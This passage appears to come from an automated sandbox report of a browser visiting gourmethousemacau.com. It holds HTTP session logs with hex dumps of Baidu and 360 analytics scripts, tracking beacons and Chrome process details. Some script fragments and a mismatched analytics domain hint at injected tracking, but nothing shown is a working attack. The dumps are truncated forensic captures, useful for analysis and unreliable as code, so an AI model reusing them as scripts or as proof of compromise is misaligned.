                                                                                                                                                              Cache-Control: max-age=315360000, immutable
                                                                                                                                                              Expires: Thu, 10 Feb 2033 12:24:44 GMT
                                                                                                                                                              KCS-Via: HIT from w-fc01.lato;MISS from w-sc02.lato
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              X-Cache: Hit from cloudfront
                                                                                                                                                              Via: 1.1 e7ac510e4ba21d85d8aee7d252b283a8.cloudfront.net (CloudFront)
                                                                                                                                                              X-Amz-Cf-Pop: ZAG50-C1
                                                                                                                                                              X-Amz-Cf-Id: yHeMQtLC4_HVWSXGYef4H-Rwa0P4GyYX4nVsNZsPvPcExCun-Z2bEA==
                                                                                                                                                              Age: 2390484
                                                                                                                                                              2023-03-13 04:26:08 UTC12INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2c 6e 3d 74 2e 73 70 6c 69 74 28 22 22 29 2e 72 65 76 65 72 73 65 28 29 2c 72 3d 65 2e 73 70 6c 69 74 28 22 22 29 2c 69 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 73 3d 30 2c 6f 3d 31 36 3b 73 3c 6f 3b 73 2b 2b 29 69 2e 70 75 73 68 28 72 5b 73 5d 2b 28 6e 5b 73 5d 7c 7c 22 22 29 29 3b 72 65 74 75 72 6e 20 69 2e 6a 6f 69 6e 28 22 22 29 7d 76 61 72 20 6e 3d 2f 28 5b 68 74 74 70 7c 68 74 74 70 73 5d 3a 5c 2f 5c 2f 5b 61 2d 7a 41 2d 5a 30 2d 39 5c 5f 5c 2e 5d 2b 5c 2e 73 6f 5c 2e 63 6f 6d 29 2f 67 69 2c 72 3d 65 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 69 66 28 72 26 26 21 6e 2e 74 65 73 74 28 72 29 26 26 77 69 6e 64 6f 77 2e
                                                                                                                                                              Data Ascii: (function(e){function t(e){var t=location.href,n=t.split("").reverse(),r=e.split(""),i=[];for(var s=0,o=16;s<o;s++)i.push(r[s]+(n[s]||""));return i.join("")}var n=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.so\.com)/gi,r=e.location.href;if(r&&!n.test(r)&&window.


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              5192.168.2.349717103.235.46.191443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2023-03-13 04:26:09 UTC12OUTGET /hm.js?3eff88a357a8c5aca6bb583a65de2875 HTTP/1.1
                                                                                                                                                              Host: hm.baidu.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2023-03-13 04:26:09 UTC14INHTTP/1.1 200 OK
                                                                                                                                                              Cache-Control: max-age=0, must-revalidate
                                                                                                                                                              Content-Length: 29781
                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:09 GMT
                                                                                                                                                              Etag: a3ff24bedc9c1af4648015185ddef181
                                                                                                                                                              P3p: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                              Server: apache
                                                                                                                                                              Set-Cookie: HMACCOUNT=C76EF187481BAB50; Path=/; Domain=hm.baidu.com; Expires=Sun, 18 Jan 2038 00:00:00 GMT
                                                                                                                                                              Set-Cookie: HMACCOUNT_BFESS=C76EF187481BAB50; Path=/; Domain=hm.baidu.com; Expires=Mon, 18 Jan 2038 00:00:00 GMT; Secure; SameSite=None
                                                                                                                                                              Strict-Transport-Security: max-age=172800
                                                                                                                                                              Connection: close
                                                                                                                                                              2023-03-13 04:26:09 UTC15INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 7b 7d 2c 6d 74 3d 7b 7d 2c 63 3d 7b 69 64 3a 22 33 65 66 66 38 38 61 33 35 37 61 38 63 35 61 63 61 36 62 62 35 38 33 61 36 35 64 65 32 38 37 35 22 2c 64 6d 3a 5b 22 6c 79 36 36 36 36 36 2e 76 69 70 22 5d 2c 6a 73 3a 22 74 6f 6e 67 6a 69 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2d 77 65 62 2f 6a 73 2f 22 2c 65 74 72 6b 3a 5b 5d 2c 63 65 74 72 6b 3a 5b 5d 2c 63 70 74 72 6b 3a 5b 5d 2c 69 63 6f 6e 3a 27 27 2c 63 74 72 6b 3a 5b 5d 2c 76 64 75 72 3a 31 38 30 30 30 30 30 2c 61 67 65 3a 33 31 35 33 36 30 30 30 30 30 30 2c 71 69 61 6f 3a 30 2c 70 74 3a 30 2c 73 70 61 3a 30 2c 61 65 74 3a 27 27 2c 68 63 61 3a 27 43 37 36 45 46 31 38 37 34 38 31 42 41 42 35 30 27 2c 61 62 3a 27 30 27 2c 76 3a 31 7d 3b 76 61 72 20
                                                                                                                                                              Data Ascii: (function(){var h={},mt={},c={id:"3eff88a357a8c5aca6bb583a65de2875",dm:["ly66666.vip"],js:"tongji.baidu.com/hm-web/js/",etrk:[],cetrk:[],cptrk:[],icon:'',ctrk:[],vdur:1800000,age:31536000000,qiao:0,pt:0,spa:0,aet:'',hca:'C76EF187481BAB50',ab:'0',v:1};var
                                                                                                                                                              2023-03-13 04:26:09 UTC15INData Raw: 28 5e 7c 20 29 22 2b 65 2b 22 3d 28 5b 5e 3b 5d 2a 29 28 3b 7c 24 29 22 29 2e 65 78 65 63 28 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 29 29 3f 65 5b 32 5d 3a 75 7d 3b 0a 6d 74 2e 63 6f 6f 6b 69 65 2e 72 62 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 61 29 7b 74 72 79 7b 76 61 72 20 62 3d 22 48 6d 5f 63 6b 5f 22 2b 20 2b 6e 65 77 20 44 61 74 65 3b 6d 74 2e 63 6f 6f 6b 69 65 2e 73 65 74 28 62 2c 22 34 32 22 2c 7b 64 6f 6d 61 69 6e 3a 65 2c 70 61 74 68 3a 61 2c 43 3a 73 7d 29 3b 76 61 72 20 6b 3d 22 34 32 22 3d 3d 3d 6d 74 2e 63 6f 6f 6b 69 65 2e 67 65 74 28 62 29 3f 22 31 22 3a 22 30 22 3b 6d 74 2e 63 6f 6f 6b 69 65 2e 73 65 74 28 62 2c 22 22 2c 7b 64 6f 6d 61 69 6e 3a 65 2c 70 61 74 68 3a 61 2c 43 3a 2d 31 7d 29 3b 72 65 74 75 72 6e 20 6b 7d 63 61 74 63 68 28
                                                                                                                                                              Data Ascii: (^| )"+e+"=([^;]*)(;|$)").exec(document.cookie))?e[2]:u};mt.cookie.rb=function(e,a){try{var b="Hm_ck_"+ +new Date;mt.cookie.set(b,"42",{domain:e,path:a,C:s});var k="42"===mt.cookie.get(b)?"1":"0";mt.cookie.set(b,"",{domain:e,path:a,C:-1});return k}catch(
                                                                                                                                                              2023-03-13 04:26:10 UTC18INData Raw: 22 28 5e 7c 26 7c 5c 5c 3f 7c 23 29 28 22 2b 61 2b 22 29 3d 28 5b 5e 26 23 5d 2a 29 28 26 7c 24 7c 23 29 22 2c 22 22 29 29 3b 72 65 74 75 72 6e 20 62 3f 62 5b 33 5d 3a 75 7d 3b 0a 6d 74 2e 75 72 6c 2e 53 61 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 65 3d 65 2e 6d 61 74 63 68 28 2f 5e 28 68 74 74 70 73 3f 3a 5c 2f 5c 2f 29 3f 28 5b 5e 5c 2f 5c 3f 23 5d 2a 29 2f 29 29 3f 65 5b 32 5d 2e 72 65 70 6c 61 63 65 28 2f 2e 2a 40 2f 2c 22 22 29 3a 75 7d 3b 6d 74 2e 75 72 6c 2e 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 65 3d 6d 74 2e 75 72 6c 2e 53 61 28 65 29 29 3f 65 2e 72 65 70 6c 61 63 65 28 2f 3a 5c 64 2b 24 2f 2c 22 22 29 3a 65 7d 3b 6d 74 2e 75 72 6c 2e 70 62 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 61 3d 64 6f
                                                                                                                                                              Data Ascii: "(^|&|\\?|#)("+a+")=([^&#]*)(&|$|#)",""));return b?b[3]:u};mt.url.Sa=function(e){return(e=e.match(/^(https?:\/\/)?([^\/\?#]*)/))?e[2].replace(/.*@/,""):u};mt.url.V=function(e){return(e=mt.url.Sa(e))?e.replace(/:\d+$/,""):e};mt.url.pb=function(e){var a=do
                                                                                                                                                              2023-03-13 04:26:10 UTC18INData Raw: 62 29 7d 3b 6d 74 2e 64 2e 56 62 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 69 66 28 21 62 29 72 65 74 75 72 6e 20 75 3b 74 72 79 7b 62 3d 53 74 72 69 6e 67 28 62 29 3b 69 66 28 30 3d 3d 3d 62 2e 69 6e 64 65 78 4f 66 28 22 21 48 4d 43 51 21 22 29 29 72 65 74 75 72 6e 20 62 3b 69 66 28 30 3d 3d 3d 62 2e 69 6e 64 65 78 4f 66 28 22 21 48 4d 43 43 21 22 29 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 62 2e 73 75 62 73 74 72 69 6e 67 28 36 2c 62 2e 6c 65 6e 67 74 68 29 29 3b 66 6f 72 28 76 61 72
                                                                                                                                                              Data Ascii: b)};mt.d.Vb=function(b){if(!b)return u;try{b=String(b);if(0===b.indexOf("!HMCQ!"))return b;if(0===b.indexOf("!HMCC!"))return document.querySelector(b.substring(6,b.length));for(var
                                                                                                                                                              2023-03-13 04:26:10 UTC18INData Raw: 20 6b 3d 62 2e 73 70 6c 69 74 28 22 3e 22 29 2c 64 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2c 61 3d 6b 2e 6c 65 6e 67 74 68 2d 31 3b 30 3c 3d 61 3b 61 2d 2d 29 69 66 28 2d 31 3c 6b 5b 61 5d 2e 69 6e 64 65 78 4f 66 28 22 23 22 29 29 7b 76 61 72 20 67 3d 6b 5b 61 5d 2e 73 70 6c 69 74 28 22 23 22 29 5b 31 5d 3b 28 64 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 67 29 29 7c 7c 28 64 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 67 29 29 29 3b 6b 3d 6b 2e 73 70 6c 69 63 65 28 61 2b 31 2c 6b 2e 6c 65 6e 67 74 68 2d 28 61 2b 31 29 29 3b 62 72 65 61 6b 7d 66 6f 72 28 62 3d 0a 30 3b 64 26 26 62 3c 6b 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 6c 3d
                                                                                                                                                              Data Ascii: k=b.split(">"),d=document.body,a=k.length-1;0<=a;a--)if(-1<k[a].indexOf("#")){var g=k[a].split("#")[1];(d=document.getElementById(g))||(d=document.getElementById(decodeURIComponent(g)));k=k.splice(a+1,k.length-(a+1));break}for(b=0;d&&b<k.length;){var l=
                                                                                                                                                              2023-03-13 04:26:10 UTC24INData Raw: 62 2e 6c 65 6e 67 74 68 2c 67 2c 6c 2c 72 3b 66 6f 72 28 6c 3d 30 3b 6c 3c 66 3b 6c 2b 2b 29 73 77 69 74 63 68 28 72 3d 62 5b 6c 5d 2c 74 79 70 65 6f 66 20 72 29 7b 63 61 73 65 20 22 75 6e 64 65 66 69 6e 65 64 22 3a 63 61 73 65 20 22 66 75 6e 63 74 69 6f 6e 22 3a 63 61 73 65 20 22 75 6e 6b 6e 6f 77 6e 22 3a 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 67 26 26 64 2e 70 75 73 68 28 22 2c 22 29 2c 64 2e 70 75 73 68 28 6d 74 2e 77 2e 73 74 72 69 6e 67 69 66 79 28 72 29 29 2c 67 3d 31 7d 64 2e 70 75 73 68 28 22 5d 22 29 3b 72 65 74 75 72 6e 20 64 2e 6a 6f 69 6e 28 22 22 29 7d 69 66 28 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 44 61 74 65 29 72 65 74 75 72 6e 27 22 27 2b 62 2e 67 65 74 46 75 6c 6c 59 65 61 72 28 29 2b 22 2d 22 2b 61 28 62 2e 67 65 74 4d 6f 6e 74 68
                                                                                                                                                              Data Ascii: b.length,g,l,r;for(l=0;l<f;l++)switch(r=b[l],typeof r){case "undefined":case "function":case "unknown":break;default:g&&d.push(","),d.push(mt.w.stringify(r)),g=1}d.push("]");return d.join("")}if(b instanceof Date)return'"'+b.getFullYear()+"-"+a(b.getMonth
                                                                                                                                                              2023-03-13 04:26:10 UTC29INData Raw: 62 61 69 64 75 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 74 6f 6e 67 6a 69 2f 70 6c 75 67 69 6e 73 2f 22 2c 6e 61 3a 5b 22 55 72 6c 43 68 61 6e 67 65 54 72 61 63 6b 65 72 22 5d 2c 4e 62 3a 7b 24 62 3a 30 2c 69 63 3a 31 2c 58 62 3a 32 7d 2c 59 62 3a 22 68 74 74 70 73 3a 2f 2f 66 63 6c 6f 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 6c 6f 67 2f 6f 63 70 63 61 67 6c 3f 74 79 70 65 3d 62 65 68 61 76 69 6f 72 26 65 6d 64 3d 65 75 63 22 7d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 74 3a 7b 7d 2c 63 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 68 69 73 2e 74 5b 61 5d 3d 74 68 69 73 2e 74 5b 61 5d 7c 7c 5b 5d 3b 74 68 69 73 2e 74 5b 61 5d 2e 70 75 73 68 28 62 29 7d 2c 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 68 69 73 2e 74 5b 61 5d 3d 74 68 69
                                                                                                                                                              Data Ascii: baidu.com/static/tongji/plugins/",na:["UrlChangeTracker"],Nb:{$b:0,ic:1,Xb:2},Yb:"https://fclog.baidu.com/log/ocpcagl?type=behavior&emd=euc"};(function(){var e={t:{},c:function(a,b){this.t[a]=this.t[a]||[];this.t[a].push(b)},k:function(a,b){this.t[a]=thi
                                                                                                                                                              2023-03-13 04:26:10 UTC31INData Raw: 6b 3c 6c 3b 6b 2b 2b 29 67 5b 62 5d 3d 22 22 2c 2f 5c 5b 31 5c 5d 24 2f 2e 74 65 73 74 28 62 29 26 26 28 67 5b 62 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 62 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 5b 22 29 29 5d 3d 22 22 29 2c 2f 5c 5d 24 2f 2e 74 65 73 74 28 62 29 7c 7c 0a 28 67 5b 62 2b 22 5b 31 5d 22 5d 3d 22 22 29 2c 62 3d 62 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 62 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 3e 22 29 29 3b 61 26 26 28 65 2e 4a 28 61 29 26 26 61 2e 62 61 29 26 26 61 2e 62 61 28 67 29 7d 2c 7a 62 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 28 65 2e 74 61 72 67 65 74 7c 7c 65 2e 73 72 63 45 6c 65 6d 65 6e 74 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 61 2e 50 2c 65 2e 63 6c 69
                                                                                                                                                              Data Ascii: k<l;k++)g[b]="",/\[1\]$/.test(b)&&(g[b.substring(0,b.lastIndexOf("["))]=""),/\]$/.test(b)||(g[b+"[1]"]=""),b=b.substring(0,b.lastIndexOf(">"));a&&(e.J(a)&&a.ba)&&a.ba(g)},zb:function(a,b){return function(e){(e.target||e.srcElement).setAttribute(a.P,e.cli
                                                                                                                                                              2023-03-13 04:26:10 UTC40INData Raw: 65 6a 69 61 6e 7a 68 61 6e 2e 63 6f 6d 20 70 72 6f 64 75 63 74 2e 77 65 69 6a 69 61 6e 7a 68 61 6e 2e 63 6f 6d 20 71 69 61 6e 68 75 2e 77 65 69 6a 69 61 6e 7a 68 61 6e 2e 63 6f 6d 20 61 69 73 69 74 65 2e 77 65 6a 69 61 6e 7a 68 61 6e 2e 63 6f 6d 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 62 29 7d 2c 41 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 22 48 6d 5f 63 6c 65 61 72 5f 63 6f 6f 6b 69 65 5f 22 2b 0a 63 2e 69 64 2c 62 3d 6e 2e 67 65 74 28 61 29 7c 7c 30 3b 63 2e 66 63 26 26 4e 75 6d 62 65 72 28 63 2e 66 63 29 3e 4e 75 6d 62 65 72 28 62 29 26 26 28 74 68 69 73 2e 64 61 28 29 2c 6e 2e 73 65 74 28 61 2c 63 2e 66 63 29 29 7d 2c 64 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e
                                                                                                                                                              Data Ascii: ejianzhan.com product.weijianzhan.com qianhu.weijianzhan.com aisite.wejianzhan.com".split(" "),b)},Aa:function(){var a="Hm_clear_cookie_"+c.id,b=n.get(a)||0;c.fc&&Number(c.fc)>Number(b)&&(this.da(),n.set(a,c.fc))},da:function(){for(var a=document.cookie.
                                                                                                                                                              2023-03-13 04:26:10 UTC43INData Raw: 73 65 6e 74 5f 22 2b 63 2e 69 64 29 7c 7c 22 5b 5d 22 29 7d 63 61 74 63 68 28 64 29 7b 62 3d 5b 5d 7d 76 61 72 20 65 3d 74 68 69 73 2e 61 2e 75 3f 22 22 3a 22 26 75 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 62 2e 70 75 73 68 28 61 2e 72 65 70 6c 61 63 65 28 2f 5e 68 74 74 70 73 3f 3a 5c 2f 5c 2f 2f 2c 22 22 29 2b 65 29 3b 67 2e 73 65 74 28 22 48 6d 5f 75 6e 73 65 6e 74 5f 22 2b 63 2e 69 64 2c 6c 2e 73 74 72 69 6e 67 69 66 79 28 62 29 29 7d 2c 6f 61 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 74 72 79 7b 62 3d 6c 2e 70 61 72 73 65 28 67 2e 67 65 74 28 22 48 6d 5f 75 6e 73 65 6e 74 5f 22 2b 63 2e 69 64 29 7c 7c 22 5b 5d 22 29 7d 63 61 74 63 68 28 64
                                                                                                                                                              Data Ascii: sent_"+c.id)||"[]")}catch(d){b=[]}var e=this.a.u?"":"&u="+encodeURIComponent(document.location.href);b.push(a.replace(/^https?:\/\//,"")+e);g.set("Hm_unsent_"+c.id,l.stringify(b))},oa:function(a){var b;try{b=l.parse(g.get("Hm_unsent_"+c.id)||"[]")}catch(d


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              6192.168.2.349727104.193.88.123443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2023-03-13 04:26:09 UTC13OUTGET /9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif?l=http://www.gourmethousemacau.com/ HTTP/1.1
                                                                                                                                                              Host: sp0.baidu.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2023-03-13 04:26:10 UTC24INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:09 GMT
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              7192.168.2.349718171.8.167.89443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2023-03-13 04:26:09 UTC13OUTGET /so/zz.gif?url=http%3A%2F%2Fwww.gourmethousemacau.com%2F&sid=d182b3f28525f2db83acfaaf6e696dba&token=d/1m8o2cb.3ufa2c8a5m2e5sfu2odhbt HTTP/1.1
                                                                                                                                                              Host: s.360.cn
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2023-03-13 04:26:10 UTC17INHTTP/1.1 200 OK
                                                                                                                                                              Server: openresty/1.15.8.2
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:09 GMT
                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Last-Modified: Mon, 29 Oct 2018 06:10:47 GMT
                                                                                                                                                              Connection: close
                                                                                                                                                              ETag: "5bd6a467-0"
                                                                                                                                                              Accept-Ranges: bytes


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              8192.168.2.349731104.193.88.123443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2023-03-13 04:26:10 UTC40OUTGET /9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif?l=http://www.gourmethousemacau.com/ HTTP/1.1
                                                                                                                                                              Host: sp0.baidu.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2023-03-13 04:26:11 UTC44INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:10 GMT
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              9192.168.2.349738103.235.46.191443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2023-03-13 04:26:11 UTC44OUTGET /hm.gif?cc=1&ck=1&cl=24-bit&ds=1280x1024&vl=913&et=0&ja=0&ln=en-us&lo=0&rnd=2010534784&si=3eff88a357a8c5aca6bb583a65de2875&v=1.3.0&lv=1&sn=31345&r=0&ww=1280&u=http%3A%2F%2Fwww.gourmethousemacau.com%2F&tt=Gourmet%20House%20Macau%20Ltd HTTP/1.1
                                                                                                                                                              Host: hm.baidu.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: HMACCOUNT_BFESS=C76EF187481BAB50
                                                                                                                                                              2023-03-13 04:26:11 UTC45INHTTP/1.1 200 OK
                                                                                                                                                              Cache-Control: private, max-age=0, no-cache
                                                                                                                                                              Content-Length: 43
                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:11 GMT
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Server: apache
                                                                                                                                                              Strict-Transport-Security: max-age=172800
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Connection: close
                                                                                                                                                              2023-03-13 04:26:11 UTC46INData Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                              Data Ascii: GIF89a!,L;


                                                                                                                                                              Click to jump to process

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Target ID:0
                                                                                                                                                              Start time:05:25:59
                                                                                                                                                              Start date:13/03/2023
                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                                                                                                                                                              Imagebase:0x7ff614650000
                                                                                                                                                              File size:2851656 bytes
                                                                                                                                                              MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low

                                                                                                                                                              Target ID:1
                                                                                                                                                              Start time:05:26:01
                                                                                                                                                              Start date:13/03/2023
                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1680,i,17073344616250618205,18426531208198070436,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                              Imagebase:0x7ff614650000
                                                                                                                                                              File size:2851656 bytes
                                                                                                                                                              MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low

                                                                                                                                                              Target ID:2
                                                                                                                                                              Start time:05:26:01
                                                                                                                                                              Start date:13/03/2023
                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "http://www.gourmethousemacau.com/
                                                                                                                                                              Imagebase:0x7ff614650000
                                                                                                                                                              File size:2851656 bytes
                                                                                                                                                              MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
